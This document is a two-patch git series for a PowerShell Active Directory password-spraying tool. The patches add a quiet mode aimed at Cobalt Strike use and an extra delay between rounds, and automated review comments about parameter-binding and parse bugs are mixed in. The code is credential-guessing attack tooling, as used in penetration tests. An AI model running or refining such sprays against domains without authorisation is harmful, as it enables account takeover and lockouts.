From d5270c1e837475275f87c9cd2f309e856c3b86bb Mon Sep 17 00:00:00 2001
From: Tim Meding
Date: Tue, 16 Apr 2019 17:31:32 -0500
Subject: [PATCH 1/2] Add Quiet Option
---
 DomainPasswordSpray.ps1 | 29 +++++++++++++++++++++++------
 1 file changed, 23 insertions(+), 6 deletions(-)
diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1
index 70d981b..ec8e1a0 100644
--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -42,6 +42,10 @@ function Invoke-DomainPasswordSpray{
 Forces the spray to continue and doesn't prompt for confirmation.
+ .PARAMETER Quiet
+
+ Less output so it will work better with things like Cobalt Strike
+
 .PARAMETER UsernameAsPassword
 For each user, will try that user's name as their password
@@ -109,7 +113,11 @@ function Invoke-DomainPasswordSpray{
 $Delay=0,
 [Parameter(Position = 9, Mandatory = $false)]
- $Jitter=0
+ $Jitter=0,
+
+ [Parameter(Position = 10, Mandatory = $false)]
+ [switch]
+ $Quiet
 )
@@ -213,13 +221,13 @@ function Invoke-DomainPasswordSpray{
 if($UsernameAsPassword)
 {
- Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter -UsernameAsPassword
+ Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter -UsernameAsPassword -Quiet $Quiet
 }
 else
 {
 for($i = 0; $i -lt $Passwords.count; $i++)
 {
- Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -Password $Passwords[$i] -OutFile $OutFile -Delay $Delay -Jitter $Jitter
+ Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -Password $Passwords[$i] -OutFile $OutFile -Delay $Delay -Jitter $Jitter -Quiet $Quiet
 if (($i+1) -lt $Passwords.count)
 {
 Countdown-Timer -Seconds (60*$observation_window)
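Review bot: In the hunk at `@@ -213,13 +221,13 @@`, both calls pass `-Quiet $Quiet`, which does not forward the caller's switch. PowerShell binds `-Quiet` as present and treats `$Quiet` as a separate positional argument, so the callee runs quiet regardless of the caller's choice, and the stray value is bound to whichever positional parameter is still free or is rejected. Use the colon form on both lines: `-Quiet:$Quiet`. The same pattern appears in PATCH 2/2 at `@@ -230,7 +237,7 @@` (`Countdown-Timer ... -Quiet $Quiet`), where, judging from the param block shown in that patch, the stray value would land in `$Message`.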
@@ -497,13 +505,19 @@ function Invoke-SpraySinglePassword
 $Jitter=0,
 [Parameter(Position=7)]
 [switch]
- $UsernameAsPassword
+ $UsernameAsPassword,
+ [Parameter(Position=7)]
+ [switch]
+ $Quiet
 )
 $time = Get-Date
 $count = $UserListArray.count
 Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())"
 $curr_user = 0
- Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
+ if ($OutFile -ne ""-and -not $Quiet)
+ {
+ Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
+ }
 $RandNo = New-Object System.Random
 foreach ($User in $UserListArray)
@@ -522,7 +536,10 @@ function Invoke-SpraySinglePassword
 Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:$Password"
 }
 $curr_user += 1
- Write-Host -nonewline "$curr_user of $count users tested`r"
+ if (-not $Quiet)
+ {
+ Write-Host -nonewline "$curr_user of $count users tested`r"
+ }
 if ($Delay)
 {
 Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
From 655d7eb0d6ef40ee469a9a8e730193e75f4149e1 Mon Sep 17 00:00:00 2001
From: Tim Medin
Date: Thu, 23 Jul 2020 16:55:14 -0500
Subject: [PATCH 2/2] Add Fudge time. Better quiet mode.
---
 DomainPasswordSpray.ps1 | 28 +++++++++++++++++++++-------
 1 file changed, 21 insertions(+), 7 deletions(-)
diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1
index ec8e1a0..1ad6e1b 100644
--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -42,6 +42,10 @@ function Invoke-DomainPasswordSpray{
 Forces the spray to continue and doesn't prompt for confirmation.
+ .PARAMETER Fudge
+
+ Extra wait time between each round of tests (seconds).
+
 .PARAMETER Quiet
 Less output so it will work better with things like Cobalt Strike
@@ -117,8 +121,11 @@ function Invoke-DomainPasswordSpray{
 [Parameter(Position = 10, Mandatory = $false)]
 [switch]
- $Quiet
+ $Quiet,
+ [Parameter(Position = 11, Mandatory = $false)]
+ [int]
+ $Fudge=10
 )
 if ($Password)
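Review bot: In the hunk at `@@ -497,13 +505,19 @@`, the new `$Quiet` parameter reuses `[Parameter(Position=7)]`, the position already assigned to `$UsernameAsPassword` directly above it. Switch parameters are normally passed by name, so the new one should carry no position: `[Parameter()]` above `[switch]` and `$Quiet`; if a position is kept it should at least be unique. The added condition `$OutFile -ne ""-and -not $Quiet` is missing a space before `-and`, and if `$OutFile` can be `$null` the comparison still passes; `-not [string]::IsNullOrEmpty($OutFile) -and -not $Quiet` covers both cases. The param block and the function body continue outside the hunk.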
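Review bot: `$Fudge` in the hunk at `@@ -117,8 +121,11 @@` (PATCH 2/2) is typed `[int]` but has no lower bound, while the later hunk computes the pause as `60*$observation_window + $Fudge`. A negative value would shorten the pause below the observation window that the countdown message says exists to avoid account lockout, so a typo on the command line can lock out accounts in the domain under test. Add `[ValidateRange(0, [int]::MaxValue)]` above `[int]`. The `.PARAMETER Fudge` help text should also state the default of 10 seconds. The param block starts outside the hunk.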
@@ -230,7 +237,7 @@ function Invoke-DomainPasswordSpray{
 Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -Password $Passwords[$i] -OutFile $OutFile -Delay $Delay -Jitter $Jitter -Quiet $Quiet
 if (($i+1) -lt $Passwords.count)
 {
- Countdown-Timer -Seconds (60*$observation_window)
+ Countdown-Timer -Seconds (60*$observation_window + $Fudge) -Quiet $Quiet
 }
 }
 }
@@ -246,14 +253,21 @@ function Countdown-Timer
 {
 param(
 $Seconds = 1800,
- $Message = "[*] Pausing to avoid account lockout."
+ $Message = "[*] Pausing to avoid account lockout.",
+ [switch] $Quiet = $False
 )
- foreach ($Count in (1..$Seconds))
+ if ($quiet)
 {
- Write-Progress -Id 1 -Activity $Message -Status "Waiting for $($Seconds/60) minutes. $($Seconds - $Count) seconds remaining" -PercentComplete (($Count / $Seconds) * 100)
- Start-Sleep -Seconds 1
+ Write-Host "$Message: Waiting for $($Seconds/60) minutes. $($Seconds - $Count)"
+ Start-Sleep -Seconds $Seconds
+ } else {
+ foreach ($Count in (1..$Seconds))
+ {
+ Write-Progress -Id 1 -Activity $Message -Status "Waiting for $($Seconds/60) minutes. $($Seconds - $Count) seconds remaining" -PercentComplete (($Count / $Seconds) * 100)
+ Start-Sleep -Seconds 1
+ }
+ Write-Progress -Id 1 -Activity $Message -Status "Completed" -PercentComplete 100 -Completed
 }
- Write-Progress -Id 1 -Activity $Message -Status "Completed" -PercentComplete 100 -Completed
 }
 function Get-DomainUserList
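Review bot: The quiet branch added to `Countdown-Timer` (hunk `@@ -246,14 +253,21 @@`) writes `"$Message: Waiting for ..."`, and inside a double-quoted string PowerShell reads `$Message:` as the start of a scope- or drive-qualified variable name. That is a parse error, so the script would fail to load at all rather than only misprint the message. Delimit the name: `Write-Host "${Message}: Waiting for $($Seconds/60) minutes."`. `$Count` is never assigned on this path, so `$($Seconds - $Count)` only repeats `$Seconds` and is dropped in the quoted line. `[switch] $Quiet = $False` can be plain `[switch] $Quiet`, since an unset switch is already false.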